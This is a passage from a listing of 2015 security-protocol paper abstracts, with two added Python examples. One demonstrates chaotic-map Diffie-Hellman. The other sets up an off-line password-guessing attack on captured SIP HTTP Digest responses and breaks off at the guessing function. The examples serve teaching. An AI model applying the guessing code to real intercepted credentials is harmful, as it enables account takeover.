
Showing papers on "Otway–Rees protocol published in 2015"


Journal ArticleDOI
TL;DR: A robust anonymous authentication protocol for health-care applications using WMSNs is proposed, which has strong security and computational efficiency and is more suitable for health-care applications using WMSNs.
Abstract: With the fast development of wireless communication technologies and semiconductor technologies, the wireless sensor network (WSN) has been widely used in many applications. As an application of the WSN, the wireless medical sensor network (WMSN) could improve health-care quality and has become important in the modern medical system. In the WMSN, physiological data are collected by sensors deployed in the patient's body and sent to health professionals' mobile devices through wireless communication. Then health professionals could get the status of the patient anywhere and anytime. The data collected by sensors are very sensitive and important. The leakage of them could compromise the patient's privacy and their malicious modification could harm the patient's health. Therefore, both security and privacy are two important issues in WMSNs. Recently, Kumar et al. proposed an efficient authentication protocol for health-care applications using WMSNs and claimed that it could withstand various attacks. However, we find that their protocol is vulnerable to the off-line password guessing attack and the privileged insider attack. We also point out that their protocol cannot provide user anonymity. In this paper, we will propose a robust anonymous authentication protocol for health-care applications using WMSNs. Compared with Kumar et al.'s protocol, the proposed protocol has strong security and computational efficiency. Therefore, it is more suitable for health-care applications using WMSNs.

273 citations


Journal ArticleDOI
TL;DR: This paper has scrutinized two remote user authentication protocols using smart card and explained that both protocols suffer from several security weaknesses, and presented a three-factor user authentication and key agreement protocol usable for TMIS, which fixes the security pitfalls.
Abstract: Telecare medical information system (TMIS) makes an efficient and convenient connection between patient(s)/user(s) and doctor(s) over the insecure internet. Therefore, data security, privacy and user authentication are enormously important for accessing important medical data over insecure communication. Recently, many user authentication protocols for TMIS have been proposed in the literature and it has been observed that most of the protocols cannot achieve complete security requirements. In this paper, we have scrutinized two (Mishra et al., Xu et al.) remote user authentication protocols using smart card and explained that both protocols suffer from several security weaknesses. We have then presented a three-factor user authentication and key agreement protocol usable for TMIS, which fixes the security pitfalls of the above-mentioned schemes. The informal cryptanalysis makes certain that the proposed protocol provides good security protection against the relevant security attacks. Furthermore, the AVISPA simulator tool confirms that the protocol is secure against active and passive attacks including replay and man-in-the-middle attacks. The security functionalities and performance comparison analysis confirm that our protocol not only provides strong protection against security attacks, but also achieves better complexities along with an efficient login and password change phase as well as the session key verification property.

121 citations


Journal ArticleDOI
TL;DR: Security analysis and performance analysis show that the proposed improved protocol could overcome the weaknesses in Zhang et al.'s protocol.
Abstract: The session initiation protocol (SIP) is the most widely used signaling protocol for controlling communication on the Internet, establishing, maintaining, and terminating the sessions. To get secure communication, many authentication protocols for SIP have been proposed. Very recently, Zhang et al. proposed a new authenticated key agreement protocol for SIP using smart card. They also showed that their protocol could withstand various attacks. However, in this paper, we point out that their protocol is vulnerable to the impersonation attack. We also propose an improved protocol to overcome the weakness. Security analysis shows that our protocol could overcome the weaknesses in Zhang et al.'s protocol. Performance analysis shows that the computational cost in the authentication phase of our protocol is about 75% of Zhang et al.'s protocol.

89 citations


Journal ArticleDOI
TL;DR: The analysis reveals that Islam et al.'s protocol suffers from user impersonation and server impersonation attacks, and an enhanced protocol is proposed that resists all known attacks.
Abstract: Telecare medical information systems (TMIS) provide rapid and convenient health care services remotely. Efficient authentication is a prerequisite to guarantee the security and privacy of patients in TMIS. Authentication is used to verify the legality of the patients and TMIS server during remote access. Very recently Islam et al. (J. Med. Syst. 38(10):135, 2014) proposed a two-factor authentication protocol for TMIS using elliptic curve cryptography (ECC) to improve Xu et al.'s (J. Med. Syst. 38(1):9994, 2014) protocol. They claimed their improved protocol to be efficient and to provide all security requirements. However, our analysis reveals that Islam et al.'s protocol suffers from user impersonation and server impersonation attacks. Furthermore, we propose an enhanced protocol. The proposed protocol, while delivering all the virtues of Islam et al.'s protocol, resists all known attacks.

88 citations


Proceedings ArticleDOI
18 May 2015
TL;DR: This paper proposes a Key Management Protocol for mobile and industrial Internet of Things systems, targeting, at the same time, robust key negotiation, lightweight node authentication, fast re-keying, and efficient protection against replay attacks.
Abstract: This paper proposes a Key Management Protocol for mobile and industrial Internet of Things systems, targeting, at the same time, robust key negotiation, lightweight node authentication, fast re-keying, and efficient protection against replay attacks. The proposed approach pragmatically leverages widely accepted Elliptic Curve Cryptography constructions, specifically the (Elliptic Curve) "Fixed" Diffie-Hellman key exchange and the (Elliptic Curve) Qu-Vanstone implicit certificates. Our value added is their suitable integration into a security protocol exchange, designed at layer 2 in the 802.15.4 protocol stack, which permits i) avoiding elliptic curve point multiplications upon rekeying of previously paired devices, and ii) supporting mutual authentication while securing the protocol exchange. To prove its viability, the proposed Key Management Protocol has been implemented and assessed on severely constrained devices. As expected, but made explicit and quantified by our experimental performance evaluation, the usage of implicit certificates in conjunction with an optimized message exchange yields impressive gains in terms of airtime consumption with respect to state-of-the-art schemes.

81 citations


Journal ArticleDOI
TL;DR: This paper proposes an improved scheme over Giri et al.'s scheme, which preserves the user anonymity property and is shown to be SAFE under the OFMC and CL-AtSe models of the AVISPA tool.
Abstract: Recently, Giri et al. proposed an RSA cryptosystem based remote user authentication scheme for telecare medical information systems and claimed that the protocol is secure against all the relevant security attacks. However, we have scrutinized Giri et al.'s protocol and pointed out that the protocol is not secure against off-line password guessing attack and privileged insider attack, and also suffers from an anonymity problem. Moreover, the extension of the password guessing attack leads to more security weaknesses. Therefore, this protocol needs improvement in terms of security before being implemented in real-life applications. To fix the mentioned security pitfalls, this paper proposes an improved scheme over Giri et al.'s scheme, which preserves the user anonymity property. We have then simulated the proposed protocol using the widely-accepted AVISPA tool, which ensures that the protocol is SAFE under the OFMC and CL-AtSe models; that means the same protocol is secure against active and passive attacks including replay and man-in-the-middle attacks. The informal cryptanalysis has also been presented, which confirmed that the proposed protocol provides good security protection against the relevant security attacks. The performance analysis section compares the proposed protocol with other existing protocols in terms of security, and it has been observed that the protocol provides more security and achieves additional functionalities such as user anonymity and session key verification.

75 citations


Journal ArticleDOI
TL;DR: The server can now authenticate the user on the request message received, rather than the response received upon sending the challenge message, saving another round-trip of exchanged messages and hence escapes a possible denial of service attack.
Abstract: The Session Initiation Protocol (SIP) has revolutionized the way of controlling Voice over Internet Protocol (VoIP) based communication sessions over an open channel. The SIP protocol is inherently insecure, being an open text-based protocol. Different solutions have been presented in the last decade to secure the protocol. Recently, Zhang et al.'s authentication protocol has been proposed with a sound feature that authenticates the users without any password-verifier database using smart card. However, the scheme has a few limitations and can be made more secure and optimized regarding the cost of exchanged messages, with a few modifications. Our proposed key-agreement protocol makes use of two server secrets for robustness and is also capable of authenticating the involved parties in a single round-trip of exchanged messages. The server can now authenticate the user on the request message received, rather than the response received upon sending the challenge message, saving another round-trip of exchanged messages and hence escaping a possible denial of service attack.

72 citations


Journal ArticleDOI
TL;DR: A bilinear pairing based three-factor remote user authentication scheme using smart card is proposed to provide a protocol free of security weaknesses, and BAN logic is used to ensure that the same protocol achieves mutual authentication and the session key agreement property securely.
Abstract: With the increasing popularity and demand for various applications, the internet user accesses remote servers by performing a remote user authentication protocol using smart card over the insecure channel. In order to resist insider attack, most users remember a set of identities and passwords for accessing different application servers. Therefore, remembering a set of identities and passwords is an extra overhead to the user. To avoid the mentioned shortcoming, many remote user authentication and key agreement protocols for multi-server architecture have been proposed in the literature. Recently, Hsieh-Leu proposed an improved protocol of Liao et al.'s scheme and claimed that the improved protocol is applicable for practical implementation. However, through careful analysis, we found that the Hsieh-Leu scheme is still vulnerable to user anonymity, password guessing attack and server masquerading attack, and that the password change phase is inefficient. Therefore, the main aim of this paper was to design a bilinear pairing based three-factor remote user authentication scheme using smart card that provides a protocol free of security weaknesses. In order to validate the security proof of the proposed protocol, this paper uses BAN logic, which ensures that the same protocol achieves mutual authentication and the session key agreement property securely. Furthermore, this paper also informally illustrates that the proposed protocol is well protected against all the relevant security attacks. The performance analysis and comparison with other schemes are also made, and it has been found that the proposed protocol achieves complete security requirements with comparatively lesser complexities.

68 citations


Journal ArticleDOI
TL;DR: This protocol is safe against active and passive attacks such as forgery, traceability, replay and de-synchronization attack, and is based on hash operation with synchronized secret.
Abstract: Radio Frequency Identification (RFID) is a technology which has multidimensional applications to reduce the complexity of today's life. Everywhere, like access control, transportation, real-time inventory, asset management and automated payment systems etc., RFID has enormous use. Recently, this technology is opening its wings in healthcare environments, where potential applications include patient monitoring, object traceability and drug administration systems etc. In this paper, we propose a secure RFID-based protocol for the medical sector. This protocol is based on a hash operation with a synchronized secret. The protocol is safe against active and passive attacks such as forgery, traceability, replay and de-synchronization attacks.

68 citations


Journal ArticleDOI
Imran Memon
TL;DR: An authentication key establishment protocol for IPv6-based road networks is introduced and a new authentication method based on a cryptographic protocol including a zero-knowledge proof is described, which each node must use to convince another node of the possession of a certain secret without revealing anything about it, and which allows encrypted communication during authentication.
Abstract: The authentication protocols are trusted components in a communication system in order to protect sensitive information against a malicious adversary in the road network environment by means of providing a variety of services including users' privacy and authentication. Authenticated key agreement protocol is a useful cryptographic primitive, which can be used to protect the confidentiality, integrity and authenticity of transmitted data over insecure networks. From the point of view of the management of pre-shared secrets, one of the advantages of three-party authenticated key agreement protocols is that they are more suitable for use in a network with large numbers of users compared with two-party authenticated key agreement protocols. Using smart cards is a practical, secure measure to protect the secret private keys of a user. In this paper, we introduce an authentication key establishment protocol for IPv6-based road networks. In this architecture, a mobile vehicle obtains a unique address from a neighbor mobile vehicle or a road side unit without duplicate address detection, and the leaving mobile vehicle's address space can be automatically reclaimed for reassignment. If the next mobile vehicle is located in transmission range, then the mobile vehicle forwards the packets; if not, then it carries the packets until meeting. The carry mostly occurs on sparsely populated road segments, with long carry distances having long end-to-end packet delays. On the other hand, we also describe a new authentication method based on a cryptographic protocol including a zero-knowledge proof that each node must use to convince another node of the possession of a certain secret without revealing anything about it, which allows encrypted communication during authentication. The proposed protocol features the following characteristics: Firstly, it offers anonymous authentication: a message issuer can authenticate itself. Secondly, it provides confidentiality: the secrecy of the communication content can be protected. The address configuration scheme must lower the cost in order to enhance the scalability. Thirdly, it is efficient: it achieves low storage requirements, fast message verification and cost-effective identity tracking in case of a dispute. In this paper, we evaluate the performance of this protocol. The data results show that the protocol effectively improves the address configuration performance and our scheme is secure against passive and active attacks. Our scheme provides high security along with low computational and communication costs. As a result, our scheme is practically suitable for mobile devices in the road network environment as compared to other related schemes in the literature.

60 citations


Journal ArticleDOI
TL;DR: A novel protocol named HashHand is proposed that not only inherits the merits of PairHand and efficiently eliminates its security vulnerabilities, but also provides a session key update mechanism.
Abstract: A handover authentication module in mobile networks enables mobile nodes to securely and seamlessly roam over multiple access points. However, designing an appropriate handover authentication protocol is a difficult task because wireless networks are susceptible to attacks, and mobile nodes have limited power and processing capability. In this article, we identify the security and efficiency requirements of a good handover authentication protocol and analyze the existing related protocols, and show that many such protocols are either insecure or inefficient. Then we review a recently proposed protocol named PairHand, which has been shown to outperform all other protocols on security and efficiency. Furthermore, we propose a novel protocol named HashHand that not only inherits the merits of PairHand and efficiently eliminates its security vulnerabilities, but also provides a session key update mechanism. Experiments using our implementation on resource-limited laptop PCs show that HashHand is feasible for practical mobile networks.

Journal ArticleDOI
TL;DR: It is demonstrated that the scheme proposed by Zhang et al. is insecure against the malicious insider impersonation attack, and an effective fix is proposed to remedy the flaw, which remedies the security flaw without sacrificing the efficiency.
Abstract: As the core signaling protocol for multimedia services, such as voice over internet protocol, the session initiation protocol (SIP) is receiving much attention and its security is becoming increasingly important. It is critical to develop a robust user authentication protocol for SIP. The original authentication protocol is not strong enough to provide an acceptable security level, and a number of authentication protocols have been proposed to strengthen the security. Recently, Zhang et al. proposed an efficient and flexible smart-card-based password authenticated key agreement protocol for SIP. They claimed that the protocol enjoys many unique properties and can withstand various attacks. However, we demonstrate that the scheme by Zhang et al. is insecure against the malicious insider impersonation attack. Specifically, a malicious user can impersonate other users registered with the same server. We also propose an effective fix, which remedies the security flaw without sacrificing the efficiency. The lesson learned is that the authenticators must be closely coupled with the identity, and we should prevent the identity from being separated from the authenticators in the future design of two-factor authentication protocols. Copyright © 2014 John Wiley & Sons, Ltd.

Journal ArticleDOI
TL;DR: This paper designs a mutual authentication protocol for RFID based on elliptic curve cryptography (ECC) that can achieve confidentiality, unforgeability, mutual authentication, tag’s anonymity, availability and forward security, and can overcome the weakness in the existing protocols.
Abstract: Radio Frequency Identification (RFID) is an automatic identification technology, which can be widely used in healthcare environments to locate and track staff, equipment and patients. However, potential security and privacy problems in RFID systems remain a challenge. In this paper, we design a mutual authentication protocol for RFID based on elliptic curve cryptography (ECC). We use a pre-computing method within the tag's communication, so that our protocol can get better efficiency. In terms of security, our protocol can achieve confidentiality, unforgeability, mutual authentication, tag's anonymity, availability and forward security. Our protocol can also overcome the weakness in the existing protocols. Therefore, our protocol is suitable for healthcare environments.

Journal ArticleDOI
TL;DR: The proposed ECM-3PAKE protocol with key confirmation is shown to be provably secure in the random oracle model and formally validated through the simulation of Automated Validation of Internet Security Protocols and Applications (AVISPA) software.

Journal ArticleDOI
TL;DR: The rigorous security analysis proves that the proposed protocol provides strong security protection on the relevant security attacks including smart card stolen attack and compares the proposed scheme with several related schemes in terms of computation cost and communication cost as well as security functionalities.
Abstract: In order to access a remote medical server, the patients generally utilize a smart card to login to the server. It has been observed that most of the user (patient) authentication protocols suffer from smart card stolen attack, which means the attacker can mount several common attacks after extracting the smart card information. Recently, Lu et al. proposed a session key agreement protocol between the patient and the remote medical server and claimed that the same protocol is secure against the relevant security attacks. However, this paper presents several security attacks on Lu et al.'s protocol such as identity trace attack, new smart card issue attack, patient impersonation attack and medical server impersonation attack. In order to fix the mentioned security pitfalls including smart card stolen attack, this paper proposes an efficient remote mutual authentication protocol using smart card. We have then simulated the proposed protocol using the widely-accepted AVISPA simulation tool, whose results make certain that the same protocol is secure against active and passive attacks including replay and man-in-the-middle attacks. Moreover, the rigorous security analysis proves that the proposed protocol provides strong security protection against the relevant security attacks including smart card stolen attack. We compare the proposed scheme with several related schemes in terms of computation cost and communication cost as well as security functionalities. It has been observed that the proposed scheme is comparatively better than the related existing schemes.

Journal ArticleDOI
TL;DR: This paper proposes the design of an efficient security protocol for MTC, designed to be compatible with the incumbent system by being composed of only symmetric cryptography and attained by aggregating many authentication requests into a single one.
Abstract: Machine-type communication (MTC) takes advantage of millions of devices being connected to each other in sensing our environment. A third-generation partnership project has been actively considering MTC as an enabler for ubiquitous computing and context-aware services. Until recently, we have not yet known how to productively manage the signaling traffic from these MTC devices because authentication requirements may impose such large signaling loads that they overwhelm the radio access of 4G cellular networks. This paper proposes the design of an efficient security protocol for MTC. This protocol is designed to be compatible with the incumbent system by being composed of only symmetric cryptography. Efficiency is attained by aggregating many authentication requests into a single one. The security and performance of the new design are evaluated via formal verification and theoretical analysis. Implementation of the proposed protocol in a real LTE-A network is provided through a feasibility analysis undertaken to prove the practicability of the protocol. Based on these evaluations, we contend that the proposed protocol is practical in terms of security and performance for MTC in LTE-Advanced.

Journal ArticleDOI
TL;DR: A simplified protocol for hierarchical dynamic quantum secret sharing (HDQSS) is proposed and it is shown that the protocol can be implemented using any existing protocol of quantum key distribution, quantum key agreement or secure direct quantum communication.
Abstract: Generalizing the notion of dynamic quantum secret sharing (DQSS), a simplified protocol for hierarchical dynamic quantum secret sharing (HDQSS) is proposed and it is shown that the protocol can be implemented using any existing protocol of quantum key distribution, quantum key agreement or secure direct quantum communication. The security of this proposed protocol against eavesdropping and collusion attacks is discussed with specific attention towards the issues related to the composability of the subprotocols that constitute the proposed protocol. The security and qubit efficiency of the proposed protocol is also compared with that of other existing protocols of DQSS. Further, it is shown that it is possible to design a semi-quantum protocol of HDQSS and in principle, the protocols of HDQSS can be implemented using any quantum state. It is also noted that the completely orthogonal-state-based realization of HDQSS protocol is possible and that HDQSS can be experimentally realized using a large number of alternative approaches.

Journal ArticleDOI
TL;DR: It is shown that only three assumptions are needed for the security, and no detailed characterizations of the source or the side-channel attacks are needed, which is another striking advantage of the RRDPS protocol over other protocols.
Abstract: Recently, a new type of quantum key distribution, called the round-robin differential phase-shift (RRDPS) protocol [Nature 509, 475 (2014)], was proposed, where the security can be guaranteed without monitoring any statistics. In this Letter, we investigate source imperfections and side-channel attacks on the source of this protocol. We show that only three assumptions are needed for the security, and no detailed characterizations of the source or the side-channel attacks are needed. This high robustness is another striking advantage of the RRDPS protocol over other protocols.

Journal ArticleDOI
TL;DR: This paper proposes a promising M2M application model that connects a mobile user with the home network using the existing popular Time Division-Synchronous Code Division Multiple Access (TD-SCDMA) network and proposes a password-based authentication and key establishment protocol to identify the communicating parties and establish a secure channel for data transmissions.
Abstract: Machine-to-machine (M2M) techniques have significant application potential in the emerging internet of things, which may cover many fields from intelligence to ubiquitous environment. However, because of the data exposure when transmitted via cable, wireless mobile devices, and other technologies, its security vulnerability has become a great concern during its further extending development. This problem may even get worse if the user privacy and property are considered. Therefore, the authentication process of communicating entities has attracted wide investigation. Meanwhile, the data confidentiality also becomes an important issue in M2M, especially when the data are transmitted in a public and thereby insecure channel. In this paper, we propose a promising M2M application model that connects a mobile user with the home network using the existing popular Time Division-Synchronous Code Division Multiple Access (TD-SCDMA) network. Subsequently, a password-based authentication and key establishment protocol is designed to identify the communicating parties and hence establish a secure channel for data transmissions. The final analysis shows the reliability of our proposed protocol. Copyright © 2012 John Wiley & Sons, Ltd.

Journal ArticleDOI
TL;DR: A passive disclosure attack on the RAPLT protocol is presented, and it is demonstrated that the SRP++ protocol can resist the exhaustive search attack with complexity $O(2^{32})$, which is the optimal security bound.
Abstract: Several lightweight RFID authentication protocols have been proposed to settle the security and privacy problems. Nevertheless, most of these protocols have been analyzed and were not successful in their attempt to achieve the claimed security objectives. In this paper, we consider the security of two recently proposed typical RFID authentication protocols: the RAPLT protocol and the SRP+ protocol. RAPLT is a new ultra-lightweight RFID protocol based on two new operations named merge and separation. Utilizing the linear property of the merge operation, we present a passive disclosure attack on the RAPLT protocol, and we can deduce the shared secrets with overwhelming probability after eavesdropping about 100 rounds of authentication sessions. SRP+ is a novel secure RFID authentication protocol conforming to the EPC C-1 G-2 standard, and we present an efficient de-synchronization attack and a passive disclosure attack through exhaustive search. Our disclosure attack only needs one run of the protocol, and the attack complexity is $O(2^{16})$ evaluations of the PRNG function in off-line analysis mode. In addition, to counteract the vulnerabilities, we propose a new modified version of the SRP+ protocol, denoted SRP++, conforming to the EPC C-1 G-2 standard. Our security analysis demonstrates that the SRP++ protocol can resist the exhaustive search attack with complexity $O(2^{32})$, which is the optimal security bound.

Proceedings ArticleDOI
20 May 2015
TL;DR: This paper presents FieldHunter, which automatically extracts fields and infers their types; providing this much needed information to the security experts for keeping pace with the increasing rate of new network applications and their underlying protocols.
Abstract: Security tools have evolved dramatically in recent years to combat the increasingly complex nature of attacks, but to be effective these tools need to be configured by experts who understand network protocols thoroughly. In this paper we present FieldHunter, which automatically extracts fields and infers their types, providing this much needed information to the security experts for keeping pace with the increasing rate of new network applications and their underlying protocols. FieldHunter relies on collecting application messages from multiple sessions and then, by applying statistical correlations, is able to infer the types of the fields. These statistical correlations can be between different messages or other associations with meta-data such as message length, client or server IPs. Our system is designed to extract and infer fields from both binary and textual protocols. We evaluated FieldHunter on real network traffic collected in ISP networks from three different continents. FieldHunter was able to extract security relevant fields and infer their nature for well documented network protocols (such as DNS and MSNP) as well as protocols for which the specifications are not publicly available (such as SopCast) and from malware (such as Ramnit).

Journal ArticleDOI
TL;DR: The formal security analysis proves that proposed 3PAKE protocol using smart card provides strong security protection on the relevant security attacks including the above-mentioned security weaknesses, and the simulation results show that the same protocol is SAFE under OFMC and CL-AtSe models.
Abstract: Three-party authenticated key exchange protocol (3PAKE) is used to provide security protection on the transmitted data over insecure communication by performing session key agreement between the entities involved. Compared with the 2PAKE protocol, the 3PAKE protocol is more suitable for managing an unrestricted number of users. Recently, several researchers have proposed many 3PAKE protocols using smart card. However, we have carefully scrutinized the recently published Yang et al.'s protocol, and it has been observed that the same protocol suffers from several security weaknesses such as insider attack, off-line password guessing attack, many logged-in users' attack and replay attack. Moreover, we have justified a serious security issue in the password change phase of the same scheme. In order to fix the above-mentioned shortcomings, this paper proposes an efficient 3PAKE protocol using smart card based on the cryptographic one-way hash function. The formal security analysis proves that the proposed protocol provides strong security protection against the relevant security attacks including the above-mentioned security weaknesses. Moreover, the simulation results of the proposed scheme using the AVISPA tool show that the same protocol is SAFE under the OFMC and CL-AtSe models. The performance comparisons are also made, which ensure that the protocol is relatively better than the existing related schemes. To the best of our knowledge, the proposed scheme should be implemented in practical applications, as it provides good security protection against the relevant security attacks, provides relatively better complexities than the existing schemes, and achieves proper mutual authentication along with a user-friendly password change phase.

Journal ArticleDOI
TL;DR: A novel chaotic map-based anonymous multi-server authenticated key agreement protocol using smart card is proposed and is shown to be twice as fast as the one proposed by Khan and He while preserving the same security properties as their protocol.
Abstract: Authenticated key agreement protocols play an important role for network-connected servers to authenticate remote users in the Internet environment. In recent years, several authenticated key agreement protocols for the single-server environment have been developed based on chaotic maps. In modern societies, people usually have to access multiple websites or enterprise servers to accomplish their daily personal matters or duties at work; therefore, how to increase users' convenience by offering a multi-server authentication protocol becomes a practical research topic. In this study, a novel chaotic map-based anonymous multi-server authenticated key agreement protocol using smart card is proposed. In this protocol, a legal user can access multiple servers using only a single secret key obtained from a trusted third party, known as the registration center. Security analysis shows this protocol is secure against well-known attacks. In addition, protocol efficiency analysis is conducted by comparing the proposed protocol with two recently proposed schemes in terms of computational cost during one authentication session. We have shown that the proposed protocol is twice as fast as the one proposed by Khan and He while preserving the same security properties as their protocol. Copyright © 2014 John Wiley & Sons, Ltd.

Journal ArticleDOI
TL;DR: The proposed protocol is provably secure and protects active and passive attacks under the chaotic maps-based Diffie-Hellman (CDH) assumption in the random oracle model using extended chaotic map.
Abstract: In recent years, many anonymous password-based mobile user authentication techniques have been constructed for roaming service in global mobility networks. However, such a type of protocol has not yet been devised in the random oracle model using extended chaotic maps. Therefore, in this paper, we put forward a new provably secure and privacy-preserving password authentication protocol using extended chaotic maps for roaming service in wireless networks. The proposed protocol is provably secure and protects against active and passive attacks under the chaotic maps-based Diffie-Hellman (CDH) assumption in the random oracle model. The proposed protocol is also analyzed and compared with the related protocol. The results proved that it is strong enough to resist different security vulnerabilities and is more efficient than the existing protocol.
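The two abstracts above rely on the chaotic maps-based Diffie-Hellman (CDH) assumption without spelling out what the underlying map is. The "extended chaotic map" in this line of work is the Chebyshev polynomial T_n(x) computed modulo a prime p, whose semigroup property T_r(T_s(x)) = T_rs(x) = T_s(T_r(x)) is what makes a Diffie-Hellman style exchange possible; the CDH assumption is that, given x, T_r(x) and T_s(x), computing T_rs(x) is hard. The following Python is an added example, not code from either paper: it implements T_n(x) mod p with square-and-multiply on the recurrence's companion matrix and runs one exchange. The prime, seed x and the exponents r and s are constructed demo values, far smaller than a real deployment would use.

```python
def _matmul(A, B, p):
    """Multiply two 2x2 matrices given as (a, b, c, d) = [[a, b], [c, d]] mod p."""
    a, b, c, d = A
    e, f, g, h = B
    return ((a * e + b * g) % p, (a * f + b * h) % p,
            (c * e + d * g) % p, (c * f + d * h) % p)


def chebyshev_mod(n: int, x: int, p: int) -> int:
    """T_n(x) mod p, where T_0 = 1, T_1 = x and T_n = 2x*T_{n-1} - T_{n-2}.

    [T_{k+1}, T_k] = M * [T_k, T_{k-1}] with M = [[2x, -1], [1, 0]], so
    T_n is read off M^(n-1) * [T_1, T_0]; square-and-multiply on M keeps
    the cost at O(log n) multiplications, as a real protocol needs.
    """
    if n < 0:
        raise ValueError("degree must be non-negative")
    t1, t0 = x % p, 1 % p
    if n == 0:
        return t0
    M = (2 * x % p, (-1) % p, 1, 0)
    R = (1, 0, 0, 1)  # identity
    k = n - 1
    while k:
        if k & 1:
            R = _matmul(R, M, p)
        M = _matmul(M, M, p)
        k >>= 1
    return (R[0] * t1 + R[1] * t0) % p


def chaotic_dh(x: int, p: int, r: int, s: int):
    """One unauthenticated chaotic-maps Diffie-Hellman run.

    Alice holds r, Bob holds s; x and p are public. Returns
    (Alice's public value, Bob's public value, Alice's key, Bob's key).
    An eavesdropper sees x, p, T_r(x) and T_s(x); recovering T_rs(x)
    from those is the CDH problem the protocols above assume is hard.
    """
    pub_a = chebyshev_mod(r, x, p)
    pub_b = chebyshev_mod(s, x, p)
    key_a = chebyshev_mod(r, pub_b, p)   # T_r(T_s(x))
    key_b = chebyshev_mod(s, pub_a, p)   # T_s(T_r(x))
    return pub_a, pub_b, key_a, key_b


# Constructed demo parameters (assumptions, not from the papers).
DEMO_P = 2 ** 61 - 1      # a Mersenne prime, convenient for a demo
DEMO_X = 123456789
DEMO_R = 987654321        # Alice's secret degree
DEMO_S = 192837465        # Bob's secret degree

if __name__ == "__main__":
    pub_a, pub_b, key_a, key_b = chaotic_dh(DEMO_X, DEMO_P, DEMO_R, DEMO_S)
    print("Alice -> Bob: T_r(x) =", pub_a)
    print("Bob -> Alice: T_s(x) =", pub_b)
    print("shared keys agree:", key_a == key_b)
```

Because T_r(T_s(x)) = T_rs(x) is a polynomial identity with integer coefficients, it survives reduction modulo any p, which is why the mod-p form is used: over the reals the same semigroup property lets an attacker find some r' with T_r'(x) = T_r(x) and break the scheme (Bergamo et al., 2005), whereas modulo a large prime the degree behaves like a discrete-log exponent. The exchange shown is the raw building block only; the papers add passwords, smart cards and server-side verification on top of it to get authentication and anonymity.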

Journal ArticleDOI
01 Mar 2015
TL;DR: This paper shows that He et al.'s improved handover authentication protocol is vulnerable to a private key compromise problem, proposes a new ID-based signature protocol, and constructs a new handover authentication protocol based on the proposed signature protocol.
Abstract: Seamless handover over multiple access points is highly desirable to mobile nodes, but ensuring security and efficiency of this process is challenging. Many such protocols have been proposed but most of them are either insecure or inefficient. Very recently, He et al. proposed an improved protocol to overcome the weakness of a novel handover authentication protocol, namely PairHand. Later, they pointed out that their protocol is vulnerable to a private key compromise problem under certain circumstances and proposed an improved protocol to overcome the weakness. In this paper, we examine the security of He et al.'s improved protocol and show it is vulnerable to a private key compromise problem. To improve security, we propose a new ID-based signature protocol and construct a new handover authentication protocol based on the proposed signature protocol.

Proceedings ArticleDOI
22 Jun 2015
TL;DR: A new method is presented for finding attacks in unmodified transport protocol implementations using the specification of the protocol state machine to reduce the search space of possible attacks by applying malicious actions to all packets of the same type observed in the same state.
Abstract: We present a new method for finding attacks in unmodified transport protocol implementations using the specification of the protocol state machine to reduce the search space of possible attacks. Such reduction is obtained by applying malicious actions to all packets of the same type observed in the same state instead of applying them to individual packets. Our method requires knowledge of the packet formats and protocol state machine. We demonstrate our approach by developing SNAKE, a tool that automatically finds performance and resource exhaustion attacks on unmodified transport protocol implementations. SNAKE utilizes virtualization to run unmodified implementations in their intended environments and network emulation to create the network topology. SNAKE was able to find 9 attacks on 2 transport protocols, 5 of which we believe to be unknown in the literature.

Journal ArticleDOI
TL;DR: Security and performance analyses show that the proposed two-factor authentication and key agreement scheme for SIP not only enhances the security, but also improves the efficiency.
Abstract: Authentication is an important security requirement for session initiation protocol (SIP). The conventional authentication method for SIP is HTTP Digest authentication, which is insecure against several security attacks. Hence, several authentication schemes have been proposed for SIP. Most recently, Jiang et al. and Yeh et al. proposed two separate authentication and key agreement schemes for SIP using smart cards. The present paper shows that Jiang et al.'s scheme is vulnerable to user impersonation attacks and Yeh et al.'s scheme is insecure against offline password guessing attacks and does not provide perfect forward secrecy. Furthermore, in order to overcome the mentioned drawbacks, this paper proposes a new two-factor authentication and key agreement scheme for SIP. Security and performance analyses show that the proposed scheme not only enhances the security, but also improves the efficiency.
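The off-line password guessing attack named in this abstract and in the 3PAKE abstract earlier on the page is easiest to see against the SIP baseline the abstract mentions, HTTP Digest authentication (RFC 2617, reused by SIP in RFC 3261). Every field of the Digest exchange except the password crosses the wire in clear, so an eavesdropper who records one REGISTER challenge and response can recompute the response for candidate passwords at leisure, with no further interaction with the server; the server nonce and client nonce only prevent replay, they do not slow guessing. The following Python is an added example, not code from the paper: it implements the Digest response computation, checks it against the RFC 2617 interoperability vector, and then runs a dictionary attack over a constructed transcript. The username, realm, nonces, wordlist and the victim's password are demo assumptions.

```python
import hashlib
from typing import Iterable, Optional


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str, method: str,
                    uri: str, nonce: str, qop: Optional[str] = None,
                    nc: Optional[str] = None, cnonce: Optional[str] = None) -> str:
    """HTTP Digest response as SIP uses it.

    HA1 = MD5(username:realm:password), HA2 = MD5(method:uri).
    Without qop (RFC 2069 form):   response = MD5(HA1:nonce:HA2)
    With qop="auth" (RFC 2617):    response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    """
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop is None:
        return md5_hex(f"{ha1}:{nonce}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


# RFC 2617 section 3.5 interoperability vector (published values, not demo data).
RFC2617_VECTOR = digest_response(
    "Mufasa", "testrealm@host.com", "Circle Of Life", "GET", "/dir/index.html",
    "dcd98b7102dd2f0e8b11d0f600bfb0c093",
    qop="auth", nc="00000001", cnonce="0a4f113b")

# Constructed SIP transcript. The victim's password is used here only to
# produce the Authorization header an eavesdropper would capture; every other
# field below is what actually appears on the wire in clear text.
_VICTIM_PASSWORD = "summer2015"                     # demo assumption
CAPTURED = {
    "username": "alice",                             # hypothetical user
    "realm": "sip.example.com",                      # hypothetical realm
    "method": "REGISTER",
    "uri": "sip:sip.example.com",
    "nonce": "4f2c9a0d7e3b1c8a5d6f0e9b2a1c3d4e",     # server nonce, in clear
    "qop": "auth",
    "nc": "00000001",
    "cnonce": "7d1e6c2b",                            # client nonce, in clear
}
CAPTURED["response"] = digest_response(password=_VICTIM_PASSWORD, **CAPTURED)

WORDLIST = ["password", "123456", "alice2015", "summer2015", "letmein"]  # constructed


def offline_guess(captured: dict, wordlist: Iterable[str]) -> Optional[str]:
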